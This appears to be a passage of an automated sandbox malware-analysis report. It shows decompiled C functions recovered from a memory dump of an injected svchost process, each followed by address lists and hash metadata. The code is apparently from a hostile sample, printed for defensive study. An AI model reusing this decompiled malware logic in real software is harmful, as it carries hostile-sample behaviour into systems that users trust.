                                                                                                                                                                                                                                                                          				void _v84;
                                                                                                                                                                                                                                                                          				intOrPtr _v88;
                                                                                                                                                                                                                                                                          				signed short _v90;
                                                                                                                                                                                                                                                                          				signed short _v92;
                                                                                                                                                                                                                                                                          				signed short _v94;
                                                                                                                                                                                                                                                                          				signed short _v96;
                                                                                                                                                                                                                                                                          				signed short _v98;
                                                                                                                                                                                                                                                                          				signed short _v102;
                                                                                                                                                                                                                                                                          				signed short _v104;
                                                                                                                                                                                                                                                                          				intOrPtr _v108;
                                                                                                                                                                                                                                                                          				intOrPtr _v112;
                                                                                                                                                                                                                                                                          				intOrPtr _v116;
                                                                                                                                                                                                                                                                          				intOrPtr _v120;
                                                                                                                                                                                                                                                                          				intOrPtr _v124;
                                                                                                                                                                                                                                                                          				intOrPtr _v128;
                                                                                                                                                                                                                                                                          				intOrPtr _v132;
                                                                                                                                                                                                                                                                          				intOrPtr _v136;
                                                                                                                                                                                                                                                                          				intOrPtr* _v140;
                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                          				void* _t149;
                                                                                                                                                                                                                                                                          				void* _t180;
                                                                                                                                                                                                                                                                          				signed int _t209;
                                                                                                                                                                                                                                                                          				void* _t210;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t180 = __edx;
                                                                                                                                                                                                                                                                          				_t149 = __ebx;
                                                                                                                                                                                                                                                                          				_v28 =  *0x429024 ^ _t209;
                                                                                                                                                                                                                                                                          				_v140 = __ecx;
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				while(_a4 != 0 && _a8 >= 1) {
                                                                                                                                                                                                                                                                          					_v16 = _a4;
                                                                                                                                                                                                                                                                          					_v12 = _a8;
                                                                                                                                                                                                                                                                          					if(_a12 != 0) {
                                                                                                                                                                                                                                                                          						memcpy( &_v84, 0x427564, 0xd << 2);
                                                                                                                                                                                                                                                                          						asm("movsw");
                                                                                                                                                                                                                                                                          						asm("movsb");
                                                                                                                                                                                                                                                                          						_v20 = 0x200;
                                                                                                                                                                                                                                                                          						_v112 = E04020CE0(_v20 + 1);
                                                                                                                                                                                                                                                                          						_v24 = _v112;
                                                                                                                                                                                                                                                                          						E04007010(0x42757e, _v24, 0, _v20 + 1);
                                                                                                                                                                                                                                                                          						 *0x4250e8( &_v104);
                                                                                                                                                                                                                                                                          						 *0x4251f8(_v24, _v20 + 1,  &_v84, _v104 & 0x0000ffff, _v102 & 0x0000ffff, _v98 & 0x0000ffff, _v96 & 0x0000ffff, _v94 & 0x0000ffff, _v92 & 0x0000ffff, _v90 & 0x0000ffff, _a12);
                                                                                                                                                                                                                                                                          						_v88 = E040070A0(_v24);
                                                                                                                                                                                                                                                                          						_v116 = E04020CE0(_a8 + _v88);
                                                                                                                                                                                                                                                                          						_v16 = _v116;
                                                                                                                                                                                                                                                                          						_push(_v88);
                                                                                                                                                                                                                                                                          						E04006CA0(_t149, 0x42757e, 0x427564, _v16, _v24);
                                                                                                                                                                                                                                                                          						_push(_a8);
                                                                                                                                                                                                                                                                          						E04006CA0(_t149, 0x42757e, 0x427564, _v16 + _v88, _a4);
                                                                                                                                                                                                                                                                          						_t210 = _t210 + 0x68;
                                                                                                                                                                                                                                                                          						_v12 = _a8 + _v88;
                                                                                                                                                                                                                                                                          						if(_v24 != 0) {
                                                                                                                                                                                                                                                                          							_v120 = _v24;
                                                                                                                                                                                                                                                                          							E04020CC0(_v120);
                                                                                                                                                                                                                                                                          							_t210 = _t210 + 4;
                                                                                                                                                                                                                                                                          							_v24 = 0x666;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if( *_v140 != 0) {
                                                                                                                                                                                                                                                                          						_v128 = E04020CE0( *((intOrPtr*)(_v140 + 4)) + _v12);
                                                                                                                                                                                                                                                                          						_v108 = _v128;
                                                                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_v140 + 4)));
                                                                                                                                                                                                                                                                          						E04006CA0(_t149, 0x42757e, 0x427564, _v108,  *_v140);
                                                                                                                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                                                                                                                          						E04006CA0(_t149, 0x42757e, 0x427564, _v108 +  *((intOrPtr*)(_v140 + 4)), _v16);
                                                                                                                                                                                                                                                                          						_t210 = _t210 + 0x1c;
                                                                                                                                                                                                                                                                          						if( *_v140 != 0) {
                                                                                                                                                                                                                                                                          							_v132 =  *_v140;
                                                                                                                                                                                                                                                                          							E04020CC0(_v132);
                                                                                                                                                                                                                                                                          							_t210 = _t210 + 4;
                                                                                                                                                                                                                                                                          							 *_v140 = 0x666;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						 *_v140 = _v108;
                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_v140 + 4)) =  *((intOrPtr*)(_v140 + 4)) + _v12;
                                                                                                                                                                                                                                                                          						_v5 = 1;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v124 = E04020CE0(_v12);
                                                                                                                                                                                                                                                                          						 *_v140 = _v124;
                                                                                                                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                                                                                                                          						E04006CA0(_t149, 0x42757e, 0x427564,  *_v140, _v16);
                                                                                                                                                                                                                                                                          						_t210 = _t210 + 0x10;
                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_v140 + 4)) = _v12;
                                                                                                                                                                                                                                                                          						_v5 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v16 != _a4 && _v16 != 0) {
                                                                                                                                                                                                                                                                          						_v136 = _v16;
                                                                                                                                                                                                                                                                          						E04020CC0(_v136);
                                                                                                                                                                                                                                                                          						_t210 = _t210 + 4;
                                                                                                                                                                                                                                                                          						_v16 = 0x666;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t180 = 0;
                                                                                                                                                                                                                                                                          					if(0 != 0) {
                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						L16:
                                                                                                                                                                                                                                                                          						return E04006C8C(_v5, _t149, _v28 ^ _t209, _t180, 0x42757e, 0x427564);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				goto L16;
                                                                                                                                                                                                                                                                          			}

































                                                                                                                                                                                                                                                                          0x0401f9f0
                                                                                                                                                                                                                                                                          0x0401f9f0
                                                                                                                                                                                                                                                                          0x0401fa00
                                                                                                                                                                                                                                                                          0x0401fa05
                                                                                                                                                                                                                                                                          0x0401fa0b
                                                                                                                                                                                                                                                                          0x0401fa0f
                                                                                                                                                                                                                                                                          0x0401fa23
                                                                                                                                                                                                                                                                          0x0401fa29
                                                                                                                                                                                                                                                                          0x0401fa30
                                                                                                                                                                                                                                                                          0x0401fa43
                                                                                                                                                                                                                                                                          0x0401fa45
                                                                                                                                                                                                                                                                          0x0401fa47
                                                                                                                                                                                                                                                                          0x0401fa48
                                                                                                                                                                                                                                                                          0x0401fa5e
                                                                                                                                                                                                                                                                          0x0401fa64
                                                                                                                                                                                                                                                                          0x0401fa74
                                                                                                                                                                                                                                                                          0x0401fa80
                                                                                                                                                                                                                                                                          0x0401fabc
                                                                                                                                                                                                                                                                          0x0401fad1
                                                                                                                                                                                                                                                                          0x0401fae3
                                                                                                                                                                                                                                                                          0x0401fae9
                                                                                                                                                                                                                                                                          0x0401faef
                                                                                                                                                                                                                                                                          0x0401faf8
                                                                                                                                                                                                                                                                          0x0401fb03
                                                                                                                                                                                                                                                                          0x0401fb0f
                                                                                                                                                                                                                                                                          0x0401fb14
                                                                                                                                                                                                                                                                          0x0401fb1d
                                                                                                                                                                                                                                                                          0x0401fb24
                                                                                                                                                                                                                                                                          0x0401fb29
                                                                                                                                                                                                                                                                          0x0401fb30
                                                                                                                                                                                                                                                                          0x0401fb35
                                                                                                                                                                                                                                                                          0x0401fb38
                                                                                                                                                                                                                                                                          0x0401fb38
                                                                                                                                                                                                                                                                          0x0401fb24
                                                                                                                                                                                                                                                                          0x0401fb48
                                                                                                                                                                                                                                                                          0x0401fba7
                                                                                                                                                                                                                                                                          0x0401fbad
                                                                                                                                                                                                                                                                          0x0401fbb9
                                                                                                                                                                                                                                                                          0x0401fbc7
                                                                                                                                                                                                                                                                          0x0401fbd2
                                                                                                                                                                                                                                                                          0x0401fbe4
                                                                                                                                                                                                                                                                          0x0401fbe9
                                                                                                                                                                                                                                                                          0x0401fbf5
                                                                                                                                                                                                                                                                          0x0401fbff
                                                                                                                                                                                                                                                                          0x0401fc06
                                                                                                                                                                                                                                                                          0x0401fc0b
                                                                                                                                                                                                                                                                          0x0401fc14
                                                                                                                                                                                                                                                                          0x0401fc14
                                                                                                                                                                                                                                                                          0x0401fc23
                                                                                                                                                                                                                                                                          0x0401fc37
                                                                                                                                                                                                                                                                          0x0401fc3a
                                                                                                                                                                                                                                                                          0x0401fb4a
                                                                                                                                                                                                                                                                          0x0401fb56
                                                                                                                                                                                                                                                                          0x0401fb62
                                                                                                                                                                                                                                                                          0x0401fb67
                                                                                                                                                                                                                                                                          0x0401fb75
                                                                                                                                                                                                                                                                          0x0401fb7a
                                                                                                                                                                                                                                                                          0x0401fb86
                                                                                                                                                                                                                                                                          0x0401fb89
                                                                                                                                                                                                                                                                          0x0401fb89
                                                                                                                                                                                                                                                                          0x0401fc44
                                                                                                                                                                                                                                                                          0x0401fc4f
                                                                                                                                                                                                                                                                          0x0401fc5c
                                                                                                                                                                                                                                                                          0x0401fc61
                                                                                                                                                                                                                                                                          0x0401fc64
                                                                                                                                                                                                                                                                          0x0401fc64
                                                                                                                                                                                                                                                                          0x0401fc6b
                                                                                                                                                                                                                                                                          0x0401fc6d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401fc73
                                                                                                                                                                                                                                                                          0x0401fc73
                                                                                                                                                                                                                                                                          0x0401fc85
                                                                                                                                                                                                                                                                          0x0401fc85
                                                                                                                                                                                                                                                                          0x0401fc6d
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _memset_strlen
                                                                                                                                                                                                                                                                          • String ID: duB
                                                                                                                                                                                                                                                                          • API String ID: 2279092321-2047154145
                                                                                                                                                                                                                                                                          • Opcode ID: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                                                                                                          • Instruction ID: c505e5f8326b13ea594a17ca5410903a82e5ac8279d4bf993f0f99441c28ac3a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F913BB5D00218AFDB54CFD8D880BAEB7B5BF48318F14C159E909A7341EB35AA85CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                                                                                          			E0401C2A0(void* __edi, signed int _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr* _v16;
                                                                                                                                                                                                                                                                          				signed char _v20;
                                                                                                                                                                                                                                                                          				signed char _v21;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				signed int* _v40;
                                                                                                                                                                                                                                                                          				intOrPtr* _v44;
                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _t103;
                                                                                                                                                                                                                                                                          				intOrPtr _t109;
                                                                                                                                                                                                                                                                          				void* _t115;
                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                          				void* _t178;
                                                                                                                                                                                                                                                                          				void* _t181;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t177 = __edi;
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				while((_a4 & 0x0000ffff) == 1 || (_a4 & 0x0000ffff) == 2 || (_a4 & 0x0000ffff) == 3 || (_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                                          					if(_a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v12 =  *0x4250e4(_a8);
                                                                                                                                                                                                                                                                          						if(_v12 < 1 || _v12 > 0x64) {
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v20 = 1;
                                                                                                                                                                                                                                                                          							if((_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                                          								L16:
                                                                                                                                                                                                                                                                          								_v21 = 0;
                                                                                                                                                                                                                                                                          								_v44 = E04020CE0(0xa);
                                                                                                                                                                                                                                                                          								_v16 = _v44;
                                                                                                                                                                                                                                                                          								E04007010(_t177, _v16, 0, 0xa);
                                                                                                                                                                                                                                                                          								 *((short*)(_v16 + 8)) = _a4;
                                                                                                                                                                                                                                                                          								_t103 = E04020CE0(_v12 + 1);
                                                                                                                                                                                                                                                                          								_t181 = _t178 + 0x14;
                                                                                                                                                                                                                                                                          								_v48 = _t103;
                                                                                                                                                                                                                                                                          								 *_v16 = _v48;
                                                                                                                                                                                                                                                                          								E04005A10(_v16,  *_v16, _v12 + 1, _a8);
                                                                                                                                                                                                                                                                          								if((_a4 & 0x0000ffff) != 4) {
                                                                                                                                                                                                                                                                          									_t109 = E04020CE0(_v20 + 1);
                                                                                                                                                                                                                                                                          									_t181 = _t181 + 4;
                                                                                                                                                                                                                                                                          									_v52 = _t109;
                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_v16 + 4)) = _v52;
                                                                                                                                                                                                                                                                          									E04005A10( *((intOrPtr*)(_v16 + 4)),  *((intOrPtr*)(_v16 + 4)), _v20 + 1, _a12);
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_v16 + 4)) =  *_a12;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v28 = E0401E4B0();
                                                                                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                                                                                          									_t115 = E0401E4A0(_v28);
                                                                                                                                                                                                                                                                          									_t178 = _t181 + 4;
                                                                                                                                                                                                                                                                          									if(_t115 == 0) {
                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v40 = 0xfa6d3c;
                                                                                                                                                                                                                                                                          									_v36 = 0x2710;
                                                                                                                                                                                                                                                                          									_v32 = 0xf9d0e8;
                                                                                                                                                                                                                                                                          									if((_a4 & 0x0000ffff) != 2) {
                                                                                                                                                                                                                                                                          										if((_a4 & 0x0000ffff) != 3) {
                                                                                                                                                                                                                                                                          											if((_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                                          												_v40 = 0xfa6d44;
                                                                                                                                                                                                                                                                          												_v36 = 0xf4240;
                                                                                                                                                                                                                                                                          												_v32 = 0x7fbee8;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											_v40 = 0xfa6d48;
                                                                                                                                                                                                                                                                          											_v36 = 0xf4240;
                                                                                                                                                                                                                                                                          											_v32 = 0xbcc7e8;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_v40 = 0xfa6d40;
                                                                                                                                                                                                                                                                          										_v36 = 0xf4240;
                                                                                                                                                                                                                                                                          										_v32 = 0x42b5e8;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									if( *_v40 < _v36) {
                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_v32 +  *_v40 * 4)) = _v16;
                                                                                                                                                                                                                                                                          										_v8 =  *_v40;
                                                                                                                                                                                                                                                                          										 *_v40 =  *_v40 + 1;
                                                                                                                                                                                                                                                                          										_v21 = 1;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									E0401E480( &_v28);
                                                                                                                                                                                                                                                                          									_t181 = _t178 + 4;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          									if( *_v16 != 0) {
                                                                                                                                                                                                                                                                          										_v56 =  *_v16;
                                                                                                                                                                                                                                                                          										E04020CC0(_v56);
                                                                                                                                                                                                                                                                          										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                                          										 *_v16 = 0x666;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									if((_a4 & 0x0000ffff) != 4 &&  *((intOrPtr*)(_v16 + 4)) != 0) {
                                                                                                                                                                                                                                                                          										_v60 =  *((intOrPtr*)(_v16 + 4));
                                                                                                                                                                                                                                                                          										E04020CC0(_v60);
                                                                                                                                                                                                                                                                          										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                                          										 *((intOrPtr*)(_v16 + 4)) = 0x666;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									if(_v16 != 0) {
                                                                                                                                                                                                                                                                          										_v64 = _v16;
                                                                                                                                                                                                                                                                          										E04020CC0(_v64);
                                                                                                                                                                                                                                                                          										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                                          										_v16 = 0x666;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(0 != 0) {
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v20 =  *0x4250e4(_a12);
                                                                                                                                                                                                                                                                          							if(_v20 < 1 || _v20 > 0x64) {
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								goto L16;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                          0x0401c2a0
                                                                                                                                                                                                                                                                          0x0401c2a6
                                                                                                                                                                                                                                                                          0x0401c2ad
                                                                                                                                                                                                                                                                          0x0401c2da
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401c2e7
                                                                                                                                                                                                                                                                          0x0401c2f1
                                                                                                                                                                                                                                                                          0x0401c2f8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401c305
                                                                                                                                                                                                                                                                          0x0401c305
                                                                                                                                                                                                                                                                          0x0401c313
                                                                                                                                                                                                                                                                          0x0401c333
                                                                                                                                                                                                                                                                          0x0401c333
                                                                                                                                                                                                                                                                          0x0401c341
                                                                                                                                                                                                                                                                          0x0401c347
                                                                                                                                                                                                                                                                          0x0401c352
                                                                                                                                                                                                                                                                          0x0401c361
                                                                                                                                                                                                                                                                          0x0401c36c
                                                                                                                                                                                                                                                                          0x0401c371
                                                                                                                                                                                                                                                                          0x0401c374
                                                                                                                                                                                                                                                                          0x0401c37d
                                                                                                                                                                                                                                                                          0x0401c390
                                                                                                                                                                                                                                                                          0x0401c39c
                                                                                                                                                                                                                                                                          0x0401c3b2
                                                                                                                                                                                                                                                                          0x0401c3b7
                                                                                                                                                                                                                                                                          0x0401c3ba
                                                                                                                                                                                                                                                                          0x0401c3c3
                                                                                                                                                                                                                                                                          0x0401c3d8
                                                                                                                                                                                                                                                                          0x0401c39e
                                                                                                                                                                                                                                                                          0x0401c3a6
                                                                                                                                                                                                                                                                          0x0401c3a6
                                                                                                                                                                                                                                                                          0x0401c3e2
                                                                                                                                                                                                                                                                          0x0401c3f3
                                                                                                                                                                                                                                                                          0x0401c3f7
                                                                                                                                                                                                                                                                          0x0401c3fc
                                                                                                                                                                                                                                                                          0x0401c401
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401c407
                                                                                                                                                                                                                                                                          0x0401c40e
                                                                                                                                                                                                                                                                          0x0401c415
                                                                                                                                                                                                                                                                          0x0401c423
                                                                                                                                                                                                                                                                          0x0401c443
                                                                                                                                                                                                                                                                          0x0401c463
                                                                                                                                                                                                                                                                          0x0401c465
                                                                                                                                                                                                                                                                          0x0401c46c
                                                                                                                                                                                                                                                                          0x0401c473
                                                                                                                                                                                                                                                                          0x0401c473
                                                                                                                                                                                                                                                                          0x0401c445
                                                                                                                                                                                                                                                                          0x0401c445
                                                                                                                                                                                                                                                                          0x0401c44c
                                                                                                                                                                                                                                                                          0x0401c453
                                                                                                                                                                                                                                                                          0x0401c453
                                                                                                                                                                                                                                                                          0x0401c425
                                                                                                                                                                                                                                                                          0x0401c425
                                                                                                                                                                                                                                                                          0x0401c42c
                                                                                                                                                                                                                                                                          0x0401c433
                                                                                                                                                                                                                                                                          0x0401c433
                                                                                                                                                                                                                                                                          0x0401c482
                                                                                                                                                                                                                                                                          0x0401c494
                                                                                                                                                                                                                                                                          0x0401c49c
                                                                                                                                                                                                                                                                          0x0401c4aa
                                                                                                                                                                                                                                                                          0x0401c4ac
                                                                                                                                                                                                                                                                          0x0401c4ac
                                                                                                                                                                                                                                                                          0x0401c3eb
                                                                                                                                                                                                                                                                          0x0401c3f0
                                                                                                                                                                                                                                                                          0x0401c3f0
                                                                                                                                                                                                                                                                          0x0401c4bb
                                                                                                                                                                                                                                                                          0x0401c4c3
                                                                                                                                                                                                                                                                          0x0401c4ca
                                                                                                                                                                                                                                                                          0x0401c4d1
                                                                                                                                                                                                                                                                          0x0401c4d6
                                                                                                                                                                                                                                                                          0x0401c4dc
                                                                                                                                                                                                                                                                          0x0401c4dc
                                                                                                                                                                                                                                                                          0x0401c4e9
                                                                                                                                                                                                                                                                          0x0401c4fa
                                                                                                                                                                                                                                                                          0x0401c501
                                                                                                                                                                                                                                                                          0x0401c506
                                                                                                                                                                                                                                                                          0x0401c50c
                                                                                                                                                                                                                                                                          0x0401c50c
                                                                                                                                                                                                                                                                          0x0401c517
                                                                                                                                                                                                                                                                          0x0401c51c
                                                                                                                                                                                                                                                                          0x0401c523
                                                                                                                                                                                                                                                                          0x0401c528
                                                                                                                                                                                                                                                                          0x0401c52b
                                                                                                                                                                                                                                                                          0x0401c52b
                                                                                                                                                                                                                                                                          0x0401c517
                                                                                                                                                                                                                                                                          0x0401c534
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401c534
                                                                                                                                                                                                                                                                          0x0401c31f
                                                                                                                                                                                                                                                                          0x0401c326
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401c326
                                                                                                                                                                                                                                                                          0x0401c2f8
                                                                                                                                                                                                                                                                          0x0401c2da
                                                                                                                                                                                                                                                                          0x0401c540

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _memset
                                                                                                                                                                                                                                                                          • String ID: d$d
                                                                                                                                                                                                                                                                          • API String ID: 2102423945-195624457
                                                                                                                                                                                                                                                                          • Opcode ID: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                                                                                                          • Instruction ID: 6121a1327febe31ce23874249aa6888692dbc835ca9b57b63cb1d65f5ac047f3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C79138B4E44218EBEB14DF94D484AEEB7B1FF49308F108559E816BB360D375EA81CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _memset_strlen
                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                          • API String ID: 2279092321-2766056989
                                                                                                                                                                                                                                                                          • Opcode ID: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                                                                                                          • Instruction ID: 9095bb450417fa4dd51ea0b819b640531f396c38f351a606dd718691427917c8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B1142B5E00208FFDB10DFE4DD45BEE77B4AB48314F508254E61477280E635BA458B65
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%